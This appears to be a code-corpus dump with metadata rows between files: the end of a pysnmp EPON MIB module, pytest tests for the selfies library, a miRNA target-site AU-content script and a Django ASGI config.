h3cDot3OmpeCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2, 2))
h3cDot3OmpeCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2, 2, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpeGroupID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3OmpeGroupStat"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3OmpeCompliance = h3cDot3OmpeCompliance.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpeCompliance.setDescription('The compliance statement for OMPEmulation interfaces.')
h3cDot3EponMauMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3))
h3cDot3EponMauObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1))
h3cDot3EponMauConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2))
h3cDot3EponMauTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1), )
if mibBuilder.loadTexts: h3cDot3EponMauTable.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauTable.setDescription('Table for dot3 MAU EPON MIB modules.')
h3cDot3EponMauEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cDot3EponMauEntry.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauEntry.setDescription('An entry in the dot3 MAU EPON MIB modules table.')
h3cDot3EponMauPCSCodingViolation = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 1), Counter32()).setUnits('octets').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3EponMauPCSCodingViolation.setReference('[802.3ah], 30.5.1.1.12.')
if mibBuilder.loadTexts: h3cDot3EponMauPCSCodingViolation.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauPCSCodingViolation.setDescription('For 100 Mb/ s operation it is a count of the number of times an invalid code-group is received, other than the /H/ code-group. For 1000 Mb/ s operation it is a count of the number of times an invalid codegroup is received, other than the /V/ code-group.')
h3cDot3EponMauFecAbility = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("unknown", 1), ("nonsupported", 2), ("supported", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3EponMauFecAbility.setReference('[802.3ah], 30.5.1.1.13.')
if mibBuilder.loadTexts: h3cDot3EponMauFecAbility.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauFecAbility.setDescription('A read-only value that indicates the support of operation of the 1000BASE-PX PHY optional FEC Sublayer for Forward error correction see [802.3ah] clause 65.2). unknown(1) value is assigned in initializing, for non FEC support state or type not yet known. nonsupported(2) value is assigned when Sublayer is not support. supported(3) value is assigned when Sublayer is supported.')
h3cDot3EponMauFecMode = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("unknown", 1), ("disabled", 2), ("enabled", 3))).clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cDot3EponMauFecMode.setReference('[802.3ah], 30.5.1.1.14.')
if mibBuilder.loadTexts: h3cDot3EponMauFecMode.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauFecMode.setDescription('A read-write value that indicates the mode of operation of the 1000BASE-PX PHY optional FEC Sublayer for Forward error correction see [802.3ah] clause 65.2). A GET operation returns the current mode of operation the PHY. A SET operation changes the mode of operation of the PHY to the indicated value. unknown(1) value is assigned in initializing, for non FEC support state or type not yet known. disabled(2) value is assigned when Sublayer operating in disabled mode. enabled(3) value is assigned when Sublayer operating in FEC mode. writing can be done all the time.')
h3cDot3EponMauFECCorrectedBlocks = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3EponMauFECCorrectedBlocks.setReference('[802.3ah], 30.5.1.1.15.')
if mibBuilder.loadTexts: h3cDot3EponMauFECCorrectedBlocks.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauFECCorrectedBlocks.setDescription('For 10PASS-TS, 2BASE-TL and 1000BASE-PX PHYs, a count of corrected FEC blocks. This counter will not increment for other PHY Types. Increment the counter by one for each received block that is corrected by the FEC function in the PHY.')
h3cDot3EponMauFECUncorrectableBlocks = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3EponMauFECUncorrectableBlocks.setReference('[802.3ah], 30.5.1.1.16.')
if mibBuilder.loadTexts: h3cDot3EponMauFECUncorrectableBlocks.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauFECUncorrectableBlocks.setDescription('For 10PASS-TS, 2BASE-TL and 1000BASE-PX PHYs, a count of uncorrectable FEC blocks. This counter will not increment for other PHY Types. Increment the counter by one for each FEC block that is determined to be uncorrectable by the FEC function in the PHY.')
h3cDot3EponMauBufferHeadCodingViolation = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 1, 1, 1, 6), Counter32()).setUnits('octets').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3EponMauBufferHeadCodingViolation.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauBufferHeadCodingViolation.setDescription('For 1000 Mbps operation it is a counts of the number of invalid code-group received directly from the link.')
h3cDot3EponMauType = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3))
h3cEponMauType1000BasePXOLT = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 1))
if mibBuilder.loadTexts: h3cEponMauType1000BasePXOLT.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePXOLT.setDescription('Multipoint MAC Control (per 802.3 section 64,65) OLT (master), unknown PMD')
if mibBuilder.loadTexts: h3cEponMauType1000BasePXOLT.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePXONU = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 2))
if mibBuilder.loadTexts: h3cEponMauType1000BasePXONU.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePXONU.setDescription('Multipoint MAC Control (per 802.3 section 64,65),ONU (slave), unknown PMD')
if mibBuilder.loadTexts: h3cEponMauType1000BasePXONU.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX10DOLT = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 3))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DOLT.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DOLT.setDescription('EPON over 10K link, downlink (per 802.3 section 60), OLT side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DOLT.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX10DONU = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 4))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DONU.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DONU.setDescription('EPON over 10K link, downlink (per 802.3 section 60), ONU side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10DONU.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX10UOLT = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 5))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UOLT.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UOLT.setDescription('EPON over 10K link, uplink (per 802.3 section 60), OLT side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UOLT.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX10UONU = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 6))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UONU.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UONU.setDescription('EPON over 10K link, uplink (per 802.3 section 60), ONU side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX10UONU.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX20DOLT = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 7))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DOLT.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DOLT.setDescription('EPON over 20K link, downlink (per 802.3 section 60), OLT side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DOLT.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX20DONU = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 8))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DONU.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DONU.setDescription('EPON over 20K link, downlink (per 802.3 section 60), ONU side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20DONU.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX20UOLT = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 9))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UOLT.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UOLT.setDescription('EPON over 20K link, uplink (per 802.3 section 60), OLT side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UOLT.setReference('[802.3ah], 30.5.1.1.2.')
h3cEponMauType1000BasePX20UONU = ObjectIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 3, 10))
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UONU.setStatus('current')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UONU.setDescription('EPON over 20K link, uplink (per 802.3 section 60), ONU side')
if mibBuilder.loadTexts: h3cEponMauType1000BasePX20UONU.setReference('[802.3ah], 30.5.1.1.2.')
h3cDot3EponMauGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2, 1))
h3cDot3EponMauGroupAll = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2, 1, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauPCSCodingViolation"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3EponMauGroupAll = h3cDot3EponMauGroupAll.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauGroupAll.setDescription('A collection of objects of dot3 MAU definition.')
h3cDot3EponMauGroupFEC = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2, 1, 2)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauFecAbility"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauFecMode"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauFECCorrectedBlocks"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauFECUncorrectableBlocks"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauBufferHeadCodingViolation"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3EponMauGroupFEC = h3cDot3EponMauGroupFEC.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauGroupFEC.setDescription('A collection of objects of FEC group definition.')
h3cDot3EponMauCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2, 2))
h3cDot3EponMauCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 3, 2, 2, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauGroupAll"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3EponMauGroupFEC"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
h3cDot3EponMauCompliance = h3cDot3EponMauCompliance.setStatus('current')
if mibBuilder.loadTexts: h3cDot3EponMauCompliance.setDescription('The compliance statement for MAU EPON interfaces.')
mibBuilder.exportSymbols("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", h3cDot3MpcpStatEntry=h3cDot3MpcpStatEntry, h3cDot3OmpEmulationSLDErrors=h3cDot3OmpEmulationSLDErrors, h3cDot3OmpEmulationStatTable=h3cDot3OmpEmulationStatTable, h3cDot3MpcpRemoteMACAddress=h3cDot3MpcpRemoteMACAddress, h3cEponMauType1000BasePXONU=h3cEponMauType1000BasePXONU, h3cDot3EponMauMIB=h3cDot3EponMauMIB, h3cDot3OmpEmulationOnuLLIDNotBroadcast=h3cDot3OmpEmulationOnuLLIDNotBroadcast, h3cDot3OmpEmulationTable=h3cDot3OmpEmulationTable, h3cDot3MpcpGroupStat=h3cDot3MpcpGroupStat, h3cDot3OmpeGroupID=h3cDot3OmpeGroupID, h3cDot3MpcpDiscoveryWindowsSent=h3cDot3MpcpDiscoveryWindowsSent, h3cDot3MpcpCompliance=h3cDot3MpcpCompliance, h3cDot3OmpEmulationID=h3cDot3OmpEmulationID, h3cEponMauType1000BasePX10UONU=h3cEponMauType1000BasePX10UONU, h3cDot3MpcpRxRegAck=h3cDot3MpcpRxRegAck, h3cDot3OmpEmulationObjects=h3cDot3OmpEmulationObjects, h3cDot3MpcpCompliances=h3cDot3MpcpCompliances, h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId=h3cDot3OmpEmulationNotBroadcastLLIDNotOnuId, h3cDot3EponMauConformance=h3cDot3EponMauConformance, h3cDot3MpcpMACCtrlFramesTransmitted=h3cDot3MpcpMACCtrlFramesTransmitted, h3cDot3MpcpRxRegister=h3cDot3MpcpRxRegister, h3cDot3MpcpDiscoveryTimeout=h3cDot3MpcpDiscoveryTimeout, h3cDot3EponMauGroups=h3cDot3EponMauGroups, h3cDot3MpcpRxRegRequest=h3cDot3MpcpRxRegRequest, h3cDot3MpcpGroupParam=h3cDot3MpcpGroupParam, h3cDot3EponMauPCSCodingViolation=h3cDot3EponMauPCSCodingViolation, h3cDot3MpcpStatTable=h3cDot3MpcpStatTable, h3cEponMauType1000BasePX10DOLT=h3cEponMauType1000BasePX10DOLT, h3cDot3OmpEmulationType=h3cDot3OmpEmulationType, h3cDot3MpcpID=h3cDot3MpcpID, h3cDot3MpcpTxRegister=h3cDot3MpcpTxRegister, h3cDot3EponMauFECCorrectedBlocks=h3cDot3EponMauFECCorrectedBlocks, h3cDot3OmpEmulationBroadcastLLIDPlusOnuId=h3cDot3OmpEmulationBroadcastLLIDPlusOnuId, h3cDot3MpcpTxReport=h3cDot3MpcpTxReport, h3cDot3OmpeGroups=h3cDot3OmpeGroups, h3cDot3MpcpOnTime=h3cDot3MpcpOnTime, h3cDot3EponMauFecMode=h3cDot3EponMauFecMode, h3cDot3OmpEmulationOnuPonCastLLID=h3cDot3OmpEmulationOnuPonCastLLID, h3cDot3MpcpTable=h3cDot3MpcpTable, h3cDot3MpcpRxGate=h3cDot3MpcpRxGate, h3cDot3MpcpTxGate=h3cDot3MpcpTxGate, h3cDot3OmpEmulationCRC8Errors=h3cDot3OmpEmulationCRC8Errors, h3cDot3EponMauGroupFEC=h3cDot3EponMauGroupFEC, h3cDot3MpcpReceiveElapsed=h3cDot3MpcpReceiveElapsed, h3cDot3MpcpTxRegRequest=h3cDot3MpcpTxRegRequest, h3cEponMauType1000BasePX20UOLT=h3cEponMauType1000BasePX20UOLT, h3cEponMauType1000BasePX20UONU=h3cEponMauType1000BasePX20UONU, h3cDot3MpcpConformance=h3cDot3MpcpConformance, h3cDot3EponMauFECUncorrectableBlocks=h3cDot3EponMauFECUncorrectableBlocks, h3cDot3OmpEmulationBroadcastLLIDNotOnuID=h3cDot3OmpEmulationBroadcastLLIDNotOnuID, h3cDot3MpcpMACCtrlFramesReceived=h3cDot3MpcpMACCtrlFramesReceived, h3cDot3OmpeConformance=h3cDot3OmpeConformance, h3cDot3MpcpMIB=h3cDot3MpcpMIB, h3cDot3OmpEmulationGoodLLID=h3cDot3OmpEmulationGoodLLID, h3cDot3MpcpAdminState=h3cDot3MpcpAdminState, h3cDot3EponMauCompliances=h3cDot3EponMauCompliances, h3cDot3OmpeCompliances=h3cDot3OmpeCompliances, h3cEponMauType1000BasePX10DONU=h3cEponMauType1000BasePX10DONU, h3cDot3MpcpEntry=h3cDot3MpcpEntry, h3cEponMauType1000BasePXOLT=h3cEponMauType1000BasePXOLT, h3cEponMauType1000BasePX10UOLT=h3cEponMauType1000BasePX10UOLT, h3cDot3EponMauCompliance=h3cDot3EponMauCompliance, h3cDot3EponMauTable=h3cDot3EponMauTable, h3cDot3OmpEmulationBadLLID=h3cDot3OmpEmulationBadLLID, h3cDot3EponMauBufferHeadCodingViolation=h3cDot3EponMauBufferHeadCodingViolation, h3cDot3MpcpSyncTime=h3cDot3MpcpSyncTime, h3cDot3OmpeGroupStat=h3cDot3OmpeGroupStat, h3cDot3OmpEmulationEntry=h3cDot3OmpEmulationEntry, h3cDot3OmpEmulationOltPonCastLLID=h3cDot3OmpEmulationOltPonCastLLID, h3cDot3EponMauObjects=h3cDot3EponMauObjects, h3cDot3MpcpOperStatus=h3cDot3MpcpOperStatus, h3cDot3EfmeponMIB=h3cDot3EfmeponMIB, h3cDot3OmpEmulationMIB=h3cDot3OmpEmulationMIB, h3cDot3EponMauFecAbility=h3cDot3EponMauFecAbility, h3cDot3EponMauType=h3cDot3EponMauType, h3cDot3MpcpObjects=h3cDot3MpcpObjects, h3cDot3EponMauEntry=h3cDot3EponMauEntry, h3cDot3MpcpGroupBase=h3cDot3MpcpGroupBase, h3cDot3MpcpRxNotSupportedMPCP=h3cDot3MpcpRxNotSupportedMPCP, h3cDot3MpcpLinkID=h3cDot3MpcpLinkID, h3cDot3MpcpRoundTripTime=h3cDot3MpcpRoundTripTime, h3cDot3MpcpOffTime=h3cDot3MpcpOffTime, h3cDot3OmpEmulationStatEntry=h3cDot3OmpEmulationStatEntry, h3cEponMauType1000BasePX20DOLT=h3cEponMauType1000BasePX20DOLT, h3cDot3MpcpMaximumPendingGrants=h3cDot3MpcpMaximumPendingGrants, h3cDot3EponMauGroupAll=h3cDot3EponMauGroupAll, h3cDot3OmpeCompliance=h3cDot3OmpeCompliance, h3cDot3MpcpMode=h3cDot3MpcpMode, h3cDot3MpcpRxReport=h3cDot3MpcpRxReport, h3cEponMauType1000BasePX20DONU=h3cEponMauType1000BasePX20DONU, PYSNMP_MODULE_ID=h3cDot3EfmeponMIB, h3cDot3MpcpRegistrationState=h3cDot3MpcpRegistrationState, h3cDot3MpcpTxRegAck=h3cDot3MpcpTxRegAck, h3cDot3MpcpTransmitElapsed=h3cDot3MpcpTransmitElapsed, h3cDot3MpcpGroups=h3cDot3MpcpGroups)
| 172.724036
| 4,940
| 0.775512
|
66665090a40521285c420044f6b7070e62249b7b
| 3,706
|
py
|
Python
|
tests/test_selfies_utils.py
|
ur-whitelab/selfies
|
6ee9529493da303f55f91994ca0c28fb04aa7606
|
[
"Apache-2.0"
] | 367
|
2019-06-03T13:07:17.000Z
|
2022-03-29T23:28:14.000Z
|
tests/test_selfies_utils.py
|
ur-whitelab/selfies
|
6ee9529493da303f55f91994ca0c28fb04aa7606
|
[
"Apache-2.0"
] | 56
|
2019-07-03T15:01:18.000Z
|
2022-02-24T19:10:49.000Z
|
tests/test_selfies_utils.py
|
ur-whitelab/selfies
|
6ee9529493da303f55f91994ca0c28fb04aa7606
|
[
"Apache-2.0"
] | 108
|
2019-06-02T01:36:31.000Z
|
2022-03-20T08:15:20.000Z
|
import pytest
import selfies as sf
class Entry:
def __init__(self, selfies, symbols, label, one_hot):
self.selfies = selfies
self.symbols = symbols
self.label = label
self.one_hot = one_hot
@pytest.fixture()
def dataset():
stoi = {"[nop]": 0, "[O]": 1, ".": 2, "[C]": 3, "[F]": 4}
itos = {i: c for c, i in stoi.items()}
pad_to_len = 4
entries = [
Entry(selfies="",
symbols=[],
label=[0, 0, 0, 0],
one_hot=[[1, 0, 0, 0, 0],
[1, 0, 0, 0, 0],
[1, 0, 0, 0, 0],
[1, 0, 0, 0, 0]]),
Entry(selfies="[C][C][C]",
symbols=["[C]", "[C]", "[C]"],
label=[3, 3, 3, 0],
one_hot=[[0, 0, 0, 1, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 1, 0],
[1, 0, 0, 0, 0]]),
Entry(selfies="[C].[C]",
symbols=["[C]", ".", "[C]"],
label=[3, 2, 3, 0],
one_hot=[[0, 0, 0, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[1, 0, 0, 0, 0]]),
Entry(selfies="[C][O][C][F]",
symbols=["[C]", "[O]", "[C]", "[F]"],
label=[3, 1, 3, 4],
one_hot=[[0, 0, 0, 1, 0],
[0, 1, 0, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1]]),
Entry(selfies="[C][O][C]",
symbols=["[C]", "[O]", "[C]"],
label=[3, 1, 3, 0],
one_hot=[[0, 0, 0, 1, 0],
[0, 1, 0, 0, 0],
[0, 0, 0, 1, 0],
[1, 0, 0, 0, 0]])
]
return entries, (stoi, itos, pad_to_len)
@pytest.fixture()
def dataset_flat_hots(dataset):
flat_hots = []
for entry in dataset[0]:
hot = [elm for vec in entry.one_hot for elm in vec]
flat_hots.append(hot)
return flat_hots
def test_len_selfies(dataset):
for entry in dataset[0]:
assert sf.len_selfies(entry.selfies) == len(entry.symbols)
def test_split_selfies(dataset):
for entry in dataset[0]:
assert list(sf.split_selfies(entry.selfies)) == entry.symbols
def test_get_alphabet_from_selfies(dataset):
entries, (vocab_stoi, _, _) = dataset
selfies = [entry.selfies for entry in entries]
alphabet = sf.get_alphabet_from_selfies(selfies)
alphabet.add("[nop]")
alphabet.add(".")
assert alphabet == set(vocab_stoi.keys())
def test_selfies_to_encoding(dataset):
entries, (vocab_stoi, vocab_itos, pad_to_len) = dataset
for entry in entries:
label, one_hot = sf.selfies_to_encoding(
entry.selfies, vocab_stoi, pad_to_len, "both"
)
assert label == entry.label
assert one_hot == entry.one_hot
# recover original selfies
selfies = sf.encoding_to_selfies(label, vocab_itos, "label")
selfies = selfies.replace("[nop]", "")
assert selfies == entry.selfies
selfies = sf.encoding_to_selfies(one_hot, vocab_itos, "one_hot")
selfies = selfies.replace("[nop]", "")
assert selfies == entry.selfies
def test_selfies_to_flat_hot(dataset, dataset_flat_hots):
entries, (vocab_stoi, vocab_itos, pad_to_len) = dataset
batch = [entry.selfies for entry in entries]
flat_hots = sf.batch_selfies_to_flat_hot(batch, vocab_stoi, pad_to_len)
assert flat_hots == dataset_flat_hots
# recover original selfies
recovered = sf.batch_flat_hot_to_selfies(flat_hots, vocab_itos)
assert batch == [s.replace("[nop]", "") for s in recovered]
| 29.887097
| 75
| 0.497572
|
93087e939536e17247d12458f25bfacc5cb78380
| 4,839
|
py
|
Python
|
scripts/module/analysis/target_site_composition.py
|
Naoto-Imamachi/MIRAGE
|
448d7f2b62f0830c0abd3eb1435d16baffc5d3f9
|
[
"MIT"
] | 3
|
2017-01-16T03:31:38.000Z
|
2021-01-04T16:00:59.000Z
|
scripts/module/analysis/target_site_composition.py
|
Imamachi-n/MIRAGE
|
448d7f2b62f0830c0abd3eb1435d16baffc5d3f9
|
[
"MIT"
] | null | null | null |
scripts/module/analysis/target_site_composition.py
|
Imamachi-n/MIRAGE
|
448d7f2b62f0830c0abd3eb1435d16baffc5d3f9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
'''
target_site_composition.py:
Calculate target site composition(e.g. AU composition flanking the seed region)
-------- miRNA
||||||||
---------------- -------- ---------------- TargetRNA
upstream seed downstream
(30nt) (8nt) (30nt)
<AU content>
(1)seed region
(2)upstream region
(3)downstream region
(4)the ohter 3'UTR region
<AU content difference>
(1)seed region - the ohter 3'UTR region
(2)upstream region - the ohter 3'UTR region
(3)downstream region - the ohter 3'UTR region
[1] Grimson A, Farh KK, Johnston WK, Garrett-Engele P, Lim LP, Bartel DP MicroRNA targeting specificity in mammals: determinants beyond seed pairing. Mol Cell. 2007 Jul 6;27(1):91-105.
'''
def au_contents(args):
total = 0
au_number = 0
for x in args:
if x == 'A' or x == 'U':
au_number += 1
total += 1
if not total == 0:
au_content = int(au_number/total*100.0*10000)/10000
else:
au_content = 'NA'
return au_content, au_number
def calc_region_AU_content_ranking(args, cons_score, windows):
au_score_list = []
window_number = len(args)-windows
for x in range(window_number):
window_seq = args[x:x+windows]
au_content_window, au_number_window = au_contents(window_seq)
au_score_list.append(int(au_content_window*10000)/10000)
au_score_list.append(cons_score)
au_score_list.sort()
score_rank = au_score_list.index(cons_score)/window_number
return score_rank
def target_site_composition(targetrna_seq, tmp_dict, window_size=30):
seed_length = 8 #windows
window_length = window_size #windows
for x in list(tmp_dict.keys()):
id_infor = x
data = id_infor.split('||')
mirna_name_id = data[0]
targetrna_id = data[1]
targetrna_st = int(data[2]) - 1
targetrna_ed = int(data[3])
seed_up = targetrna_st - window_size
seed_down = targetrna_ed + window_size
#region infor
seed_match = targetrna_seq[targetrna_st:targetrna_ed]
if seed_up < 0:
seed_up = 0
seed_around_up = targetrna_seq[seed_up:targetrna_st] #upstream UTR
seed_around_down = targetrna_seq[targetrna_ed:seed_down] #downstream UTR
other_up = targetrna_seq[:seed_up]
other_down = targetrna_seq[seed_down:]
total_seq = other_up + other_down
#AU content in 3'UTR regions
au_content_utr, au_number_utr = au_contents(total_seq)
au_content_seed_around_up, au_number_seed_around_up = au_contents(seed_around_up)
au_content_seed_around_down, au_number_seed_around_down = au_contents(seed_around_down)
au_content_seed_match, au_number_seed_match = au_contents(seed_match)
#diff AU content(seed_around vs the other 3'UTR region)
if au_content_utr == 'NA':
diff_au_content_seed_around_up = 'NA'
diff_au_content_seed_around_down = 'NA'
diff_au_content_seed_match = 'NA'
else:
if not au_content_seed_around_up == 'NA':
diff_au_content_seed_around_up = au_content_seed_around_up - au_content_utr
else:
diff_au_content_seed_around_up = 'NA'
if not au_content_seed_around_down == 'NA':
diff_au_content_seed_around_down = au_content_seed_around_down - au_content_utr
else:
diff_au_content_seed_around_down = 'NA'
if not au_content_seed_match == 'NA':
diff_au_content_seed_match = au_content_seed_match - au_content_utr
else:
diff_au_content_seed_match = 'NA'
#calculate_AU-content_ranking_in_seed_region(or miRNA-TargetRNA hybrid region)
#print(x)
if not au_content_seed_around_up == 'NA':
AU_content_rank_upstream = calc_region_AU_content_ranking(targetrna_seq, au_content_seed_around_up, window_length)
else:
AU_content_rank_upstream = 'NA'
if not au_content_seed_around_down == 'NA':
AU_content_rank_downstream = calc_region_AU_content_ranking(targetrna_seq, au_content_seed_around_down, window_length)
else:
AU_content_rank_downstream = 'NA'
#result(3UTR_AU - seed_up_AU - seed_down_AU - seed_AU - diff_up_AU - diff_down_AU - diff_seed_AU)
tmp_dict[x].extend([au_content_utr, au_content_seed_around_up, au_content_seed_around_down, au_content_seed_match, diff_au_content_seed_around_up, diff_au_content_seed_around_down, diff_au_content_seed_match])
tmp_dict[x].extend([AU_content_rank_upstream, AU_content_rank_downstream])
return tmp_dict
| 41.715517
| 218
| 0.65902
|
6ba9fb808a4ebd5075f96b0aaaf86e1930c26ef2
| 387
|
py
|
Python
|
ghost/asgi.py
|
safia88/GhostPost
|
5e774ffbefcdb7b8a19f2a59b2ab4bfcf56b728c
|
[
"MIT"
] | null | null | null |
ghost/asgi.py
|
safia88/GhostPost
|
5e774ffbefcdb7b8a19f2a59b2ab4bfcf56b728c
|
[
"MIT"
] | null | null | null |
ghost/asgi.py
|
safia88/GhostPost
|
5e774ffbefcdb7b8a19f2a59b2ab4bfcf56b728c
|
[
"MIT"
] | null | null | null |
"""
ASGI config for ghost project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ghost.settings')
application = get_asgi_application()
| 22.764706
| 78
| 0.782946
|
03a6142f682e34614a93e0b15e5b0c743802b1c4
| 277
|
py
|
Python
|
PythonExercicios/ex107/teste.py
|
Lucas-ns/Python-3-Curso-Em-Video
|
f6d338fffd7a4606d34fab09634eea0fe4b3dfb3
|
[
"MIT"
] | null | null | null |
